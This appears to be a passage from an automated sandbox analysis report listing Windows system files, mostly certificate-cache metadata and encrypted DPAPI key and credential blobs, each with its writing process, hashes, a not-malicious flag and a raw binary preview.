                                                                                                            Preview:0..........0.....+.....0......0...0......N"T ....n..........9..20241005213216Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9...C.P..5/..y.r..P....20241005213216Z....20241012213216Z0...*.H................\.m*.]w..q...j$WX..(......d]u.s.........wr..~D....*|.#..s.!.f.SO<.'....ud.)..D.....8.....E..0D..>y....g"..l..9.J.D.=.v...l.!...M..=.=..`/<?.D...u...!.v.S.[.....z-........1..t+......l..p.b7w...6..nb=..a#L%yF.]......=..7v....K7.X?\...V.m...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                                                                                            Category:dropped
                                                                                                            Size (bytes):7796
                                                                                                            Entropy (8bit):7.971943145771426
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                                                                                            MD5:FB60E1AFE48764E6BF78719C07813D32
                                                                                                            SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                                                                                            SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                                                                                            SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                                                                                            Malicious:false
                                                                                                            Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):338
                                                                                                            Entropy (8bit):3.8878962048609575
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKyPUxpbHL2iJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:q8DqkPlE99SCQl2DUevat
                                                                                                            MD5:DC76E552722151368BA5A188661AB48F
                                                                                                            SHA1:307D38D81704A852CA2011E95A9AE0B9F52DB938
                                                                                                            SHA-256:375DFFF8F63714DA2A68BF17E379A901C6871A9EA7F1F1B38FF1B2C4A2113F48
                                                                                                            SHA-512:20A20B8862AB537016A641FB36A179A3944C22385EE8D221036A3FE552704F33B899B16E782EF7388BA834E89E6557095A9FD11FD001F4750C7282621E4ADF64
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ........V...r...(...............*...r...*EJ.....*u.4............*EJ..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):328
                                                                                                            Entropy (8bit):3.9418431539583025
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kK7JINrzu6rAz3sTwDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DGzu6Y5nLNkPlE99SNxAhUe/3
                                                                                                            MD5:B00413832F207BCD6B75B252CEB581B1
                                                                                                            SHA1:7DAEEC9A6AADDB6EA60298F6F57C5C185488CBD9
                                                                                                            SHA-256:D9E9BC0C39F3A261E2B0888E2307121B848863CED1DF0161512F26CE6F14F4C6
                                                                                                            SHA-512:3FE1C0347FD8C607C580676B0BF335B5788B76881D2968BDC0D28F930C29CAE60BB41D835A180BA02B6DE3A60DC8BBBFEB818DB2DC5B5BDFC389EC8B086839A2
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ........V..%s...(................D.%s.....M.....................M.... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.682052822289051
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKirfE3RlXlRNfOAUMivhClroFFKIhipStaHAaloq09Slscqsn:jRmxMiv8sFFKbpgal7BlSs
                                                                                                            MD5:DB76A981AF378EF147AEFDACDA9BEAAD
                                                                                                            SHA1:AABE038A51FB1629BA8AC2417B86E32402172521
                                                                                                            SHA-256:F7325AE909F86006A9C19975A43CA0C6EFBB0D400AD99D4B9C6469339DC0E266
                                                                                                            SHA-512:9283B21EB99C374B14D906C30ABECD25BED7E1F68A266E4AF101529C4E89BF6C1D5A0C337266F51E6BA5917584015A995A508A73C4B83239028FF1AEBDCD47E0
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ....(...(n..r...(.................................................Y..... ........`dkg... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.n.5.b.s.K.V.V.V.8.k.d.J.6.v.H.l.3.O.1.J.0.%.3.D...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.6519909859104858
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKwilXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsQ30P7v+eWAkrn:pmxMiv8sFFKbpgal7BlD30PLRWAkr
                                                                                                            MD5:19B1F442822E575CC93C979E04CA17E9
                                                                                                            SHA1:329F894E3317973D4FD32D3571CC0E94A1B96FF0
                                                                                                            SHA-256:161697AD667ADE31EEEC1B9691640A6B7B22D3B04493909956A1FDDEA1CDF92C
                                                                                                            SHA-512:AB61FE7F7719877115C5044B8CD91EFC0862FB263DF4E1DD7236A7A05CF7ADBAC97AE3A79107949091CF71D258CA4F34C7D8F926BC0C11D688FCB7F493BA76A3
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ....(....,q.s...(................................................X...... ........#.mg... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.U.Z.Z.S.Z.E.m.l.4.9.G.j.h.0.j.1.3.P.6.8.w.%.3.D...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.6317836364947267
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKiqdQaT4/lXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:KqdKmxMiv8sFFKbpgal7BlwhZg
                                                                                                            MD5:CFC800BD78E822D09E5683DEF5AA8970
                                                                                                            SHA1:70C7653A31CA8CA6E6F4FA11F17E72E279D30446
                                                                                                            SHA-256:AEF2764714087C0DEACE870CCC9EDD5F1E0924392688FEB32A5606845DFD5F91
                                                                                                            SHA-512:4D7F62216247EAC54563C91DAED3D316FB0146B4A814C651DD2234F62378361EF463F00B684CCD66772C443EFF1CFABDD2B94CE33BB61860BB7563CCD909F18A
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ....(..."...r...(................................................0S5.... ..........j... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):330
                                                                                                            Entropy (8bit):3.89913389205871
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKNf+k0zK/Lc8uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:F0zCkPlE99Si1QyIeek
                                                                                                            MD5:91B7B21756E409813805253C56E56676
                                                                                                            SHA1:3DEA243498AB72ADFCBF75FE3DFE16230D3A83C0
                                                                                                            SHA-256:EE4F61D2210BFE9DC7EE0A910724216BE5F99AD6C6C96A6AC48D04ED4918CB48
                                                                                                            SHA-512:645F3C540BA0C30F2DC2918ADEE59A3BC426FFA901E124606BBF2D7CF62EE918CF7AB25B7F62FD00B0378570D6FF43C419FCB403EB438BBB5C8F34BC8A2C78F8
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ........$..s...(................QP7s.....S......................S.... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):11152
                                                                                                            Entropy (8bit):7.979334949796543
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:gZSts3ih7Rp4WGJ6w+vvtS5r/dRm579nepBFU/3FlinbZdTm/vIH2uykc4bq:O3o1+6wuAx/dJFuqbZtII9yye
                                                                                                            MD5:24204389CFF063A422F647B2D3D61C90
                                                                                                            SHA1:5728DFC3B9CF6E2D37EB24EF0AF864D85FE630A8
                                                                                                            SHA-256:ADAC6C0F3817714ED65BE572E6EAC3426D22CDA364D22D85EB944DEC9826ED9B
                                                                                                            SHA-512:7E89F8D7E12F9378712A23E51FFF601A4A37AEA2B6D43762D33099DF87773ECEB44D8FF4075560A78ECA1EABC9D8EF355C488C1261C01384B41FB0047D8708D6
                                                                                                            Malicious:false
                                                                                                            Preview:.....+..................z..O......5.....5K.-"...R.... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ...U......P.\.....o.4j.|...T.U.G............. ....K,..U).QPN.).U..Gm....b.E<...,.*....b2E....,.?.Bl.`.%&..i\r..Q..i..nY.......*.-....us.j.^......m.....Kq!....IkZ...@n..&..?.ET...u.'...d9.M....v..D.l.......V./f....L...^.A.*L...../...hnT....o...Z.y.Y.1..Z.........z.57..F.%.St( 2.. .t<...o.}*.{.x..x.Q>R.....].....3.P.....aA.....S.....,z...b.Q.v.]4x..rP.....).vC...i.d..M4&...t...K` .<%...6T...b.2nr;4.6..%.V....<..~...li/...e../...u.Z...<b...=...)\.....1..]~\.L..H..`-.0'...<.Q>..cC.L........;.=h....s..D.'.*4...s.E.U......`..nBW...+...._..I..@g..t.5..CX..(..ql.M....._M .'>.[.....W...YUD......H.+p.A.0..O`p.cG...S.(..0.9N'*...].(.7..'.....P..Y..Q..Eyl..-..b......6B....n.y...w(..S..FFm).K#.-.._.tQ..f...j.Y.QB...E.T..3m.W.Q.AG..b.[ .s5......6.F..~..V...I..E..o...wTe....L....,........{(..[.0sf*.&.0.(...c.(.....%..[.{.m.........=4...&...

                                                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):400
                                                                                                            Entropy (8bit):3.9434872284341003
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKA3ml/3vmc4iXLNfOAUMivhClroFp736ZWx8GrZoAK+SosEwmPcbLOarUuJn:nlVjbNmxMiv8sFpT6er+OwmUeeL
                                                                                                            MD5:3B7839A1B43DE9059F5E9AA0A275D715
                                                                                                            SHA1:9573FE48C781284A7CBDC03AE3653BC23F129317
                                                                                                            SHA-256:074E526CC15BBDD69B9BCC3CB2D8EFE635FAE2E1AE14D82BB02794724592442B
                                                                                                            SHA-512:A94DB88F42A71559277696B53547FCFF0F2F771B28F406711FAE4E1DA662407F79A9B91E5839D5EEBA31E457EAD6E744E6A27042F566EC2113FBC9AED289A4B5
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ..........5Is...(.......2..........on....]......................]..... ..........gg... ...............8...h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.r.j.r.y.d.R.y.t.%.2.B.A.p.F.3.G.S.P.y.p.f.H.B.x.R.5.X.t.Q.Q.U.s.9.t.I.p.P.m.h.x.d.i.u.N.k.H.M.E.W.N.p.Y.i.m.8.S.8.Y.C.E.A.I.5.P.U.j.X.A.k.J.a.f.L.Q.c.A.A.s.O.1.8.o.%.3.D...

                                                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):302
                                                                                                            Entropy (8bit):3.5151109508444507
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKFzPUxpbHL2XaN+SkQlPlEGYRMY9z+s3Ql2DUe/:tz8DqkPlE99SCQl2DUe/
                                                                                                            MD5:A48AC77788B5A541231CC95E2AEEF5EA
                                                                                                            SHA1:40E24DEF811636645158D4CDD71655A8D24290F6
                                                                                                            SHA-256:5E458E519E147B6D107133802BB49C7365D6260F566D01765505BEEBD2D121ED
                                                                                                            SHA-512:0B644841C47965AE7E0D7C9835F2707955A98385AD06E6D7CEDAA216DDF1153B824C6470500E2A9D1BADFC774A4C96BAC580FC677FE9772B50B53138A64ABC1F
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ...........j....(...............*...r...*EJ.....*u.4............*EJ..... ...................................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...

                                                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):290
                                                                                                            Entropy (8bit):3.5114435170689555
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKpUUIVcLHPiLcLMaN+SkQlPlEGYRMY9z+4D1QuflIe/:xnHPKkPlE99Si1QyIe/
                                                                                                            MD5:0024861DE17B9D4DD40E62494E4AF57C
                                                                                                            SHA1:D975DA98EC14D67E98F48B4C45D4331F26F462FF
                                                                                                            SHA-256:0955FD7749B1812AA923F995506385562CE694E546F85D026A558037EDE597F8
                                                                                                            SHA-512:FCF1C54D2F0B152C21F9E49FA18DB7BE968361C414B31880E33A415B5AB31369FC959F2420B9B0F2C9A2BD64F4D3F6808AB55F294E9586864F495E5D5378B271
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ...........j....(................t..s............$jk.................... ...................................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24
                                                                                                            Entropy (8bit):4.501629167387823
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:b7jbgVbn:bkVb
                                                                                                            MD5:3C7BD2FDCBE0FD9B88E6E3CE836AC606
                                                                                                            SHA1:E6FFAA377EB617158EDB5B53B97AFDD99F1B5518
                                                                                                            SHA-256:37CE4B34C2F8B29CB249E299084E01BAFA2723065384359E5E2BE553709A8D1C
                                                                                                            SHA-512:3E5A8F5A7DB89F453BC1171B6EBD2D100F1B89AA96FACCEA7DB9864592D8C15A65033EF46D12050FE294945508E305483D0280289942644C819EAEB643782DCD
                                                                                                            Malicious:false
                                                                                                            Preview:5.....5K.-"...R.0...+_..

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\e481ff35-c61f-4b35-b72d-22da10d15209

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):468
                                                                                                            Entropy (8bit):6.446728442472179
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:inW5zWf3luM11IlAdiUERc/rf0wSAvqVBoXurI0bwtdA79Jz/RDK9Ur6XXsWzO75:aW5zQwi1nUXYDCrIGwM5znrKO/Xrx
                                                                                                            MD5:2D6F8973D9478E4A71A7C97A06A62848
                                                                                                            SHA1:D1934D57819C0FF2CB781279C17ECAEEEA0DB9CC
                                                                                                            SHA-256:2C7825672DD76C212B6E7D35F9ADE6C30670C4F5536FA10690BEFEAF7CDDD34F
                                                                                                            SHA-512:9988D5D61B3A713F5E86E16DD59142A41D267B6D734393366DB1D4D4AB1548F0055904BC5E35ED1F2A622B3DE25FE1F90C407A25477D5539C7FDBD41E9E707B6
                                                                                                            Malicious:false
                                                                                                            Preview:............e.4.8.1.f.f.3.5.-.c.6.1.f.-.4.b.3.5.-.b.7.2.d.-.2.2.d.a.1.0.d.1.5.2.0.9.....................................................S&f._.Hq....@........f....Y....R:.....R.Jw.K.l.h$..IT+]8..5....ziz.....s..7/%...1&..>i.A..X.U...!H.+..P.t.b.=..]..v....QWw..w...o.$cJ.....4\.}.......C.P2...V.....g......Q...CM...6...@........f......R7.j..>...."...v.O..5[.X.....P.....O.U....8..<...[..s.i..0^.....5^..K.^....-..O...7...c..|.e.I..........&..{..B.).X....

                                                                                                            C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24
                                                                                                            Entropy (8bit):4.501629167387823
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:SlOVzF31wIb:SlOJFO4
                                                                                                            MD5:83264C210CED1111DD5AEEE689F3050B
                                                                                                            SHA1:C23F9793B18536B17050CBC1BF668FD4C1ABBAB9
                                                                                                            SHA-256:D9B8873E268AF47784363297390AF0F050E9F02A8ED6E16B7EAE69FEB7F924FC
                                                                                                            SHA-512:4C2E3ECB61E12E4B0948A4598553C947BC6316FF5B048EAB5C751B17EDEFCD091E4E67D5E805FF7EE800BBD1F01B234F8264D58FA3044B1E140B283DFCFA5F6A
                                                                                                            Malicious:false
                                                                                                            Preview:5bx.p.L...~.T..P.6.+_..

                                                                                                            C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c2786235-70ab-4cdc-b58e-997eca54c008

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):468
                                                                                                            Entropy (8bit):6.161627650457805
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:BI3sGPE9/Je2bhyG+fdEP9BQ12OHhhg27XOD/WcVYPkZ:B2F8dbhyG+K1/Yhhg27XOjWcVYPi
                                                                                                            MD5:24A5827F6F80E0783584F71B965F20A3
                                                                                                            SHA1:978DA6F765A614F4B2E43BDEC46EF499F117663D
                                                                                                            SHA-256:BFB09A4EDB88EFBD70BFEAFA38BCCE8F4ABC89CA89D9013F7597CCE299A2A1D8
                                                                                                            SHA-512:DED0577825C6F3ED9D51861BC8DB6D861C6B3730B7D374E5086EFF7EF807FE6F0D50C35A720462C8ACEF000EE3D1D01EC78DEC94640AD57F1DEDCED107189A7F
                                                                                                            Malicious:false
                                                                                                            Preview:............c.2.7.8.6.2.3.5.-.7.0.a.b.-.4.c.d.c.-.b.5.8.e.-.9.9.7.e.c.a.5.4.c.0.0.8..................................................j.e...6%R.....=@........f...Q.,......AK....8N.......<.J+.f.A....b.......o(EN4..C..J,....[....|.|...x...xU.M-.u....{...`5b0.fB..r..."...M1......S..........Zf[`..q.0.........o.'I.....@........f....[.D....&b.m..x.(.#..i...`+....?.. 7W.f...]..f..]?9=.......%.-..dx...,.='0.B$....._.D.PK}......i9>8(..0...c.....................

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):338
                                                                                                            Entropy (8bit):3.951769064964733
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKi39PUxpbHL2iJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:c8DqkPlE99SCQl2DUevat
                                                                                                            MD5:3BAD55DB5AD957F28A62DCAB4B204ACD
                                                                                                            SHA1:8C932D7473520E9C5D5BBB21A0623C5A490C822D
                                                                                                            SHA-256:CD917849BEA9926181FF61BA716A0DEF496BA4546AAAB68AC47C1D6280FC2EA9
                                                                                                            SHA-512:A07A060BCA42D0F88A2008D85B5AB0F51EEA50EDB9C79FA2B0FFC6ECAD5B019840C0CF1CE20A4A1685BB37C8D27AEC869A7DDB624546B36374A8503684ABFFFE
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ........+.].....(...............*...r...*EJ.....*u.4............*EJ..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):290
                                                                                                            Entropy (8bit):3.535875048555849
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKlvaNrzu6rAzMaN+SkQlPlEGYRMY9z+4KlDA3RUe/:9vOzu6YYkPlE99SNxAhUe/
                                                                                                            MD5:57B9339B1FC13FDA133814AAB7A67432
                                                                                                            SHA1:AEC2FAA3D0FDC00032E2535088E825E8507E0EEA
                                                                                                            SHA-256:DC3D44BC6D9FEE1FA6702F470A65F6059C80CF4F064FDA6B2AFE1E5659761414
                                                                                                            SHA-512:93FD7DF685BCD3CBF1360F9A5C8EC9071BAC6D6521971A06B6A815167728585C08920831A759749843F3AE594707FB28121B91C75004E02D1A981568BD588FA4
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ..........C.....(................D.%s.....M.....................M.... ...................................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.9782949504254868
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKt5O8sYe8kt2alXlRNfOAUMivhClroFFKIhipStaHAaloq09Sls8hW0XSW83n:G1zmxMiv8sFFKbpgal7BlvTCN3
                                                                                                            MD5:427724F33D4B477980810DE0332E089B
                                                                                                            SHA1:EE5DF5B6A08AD863DD3F76601017FDE466CA54BC
                                                                                                            SHA-256:0C4F58A824257F47FBB2926AA923D3AD38522B25F9E24B51D84E82140F030406
                                                                                                            SHA-512:EDF1A09A6A7347F32DE36BD0F7ECC687BF55B5F59EA0A73749DE811B21F627E3CFDE3EF7C0C99611EBEFFB124804D35CAFE333366EB7198BBF47933BABF937CC
                                                                                                            Malicious:false
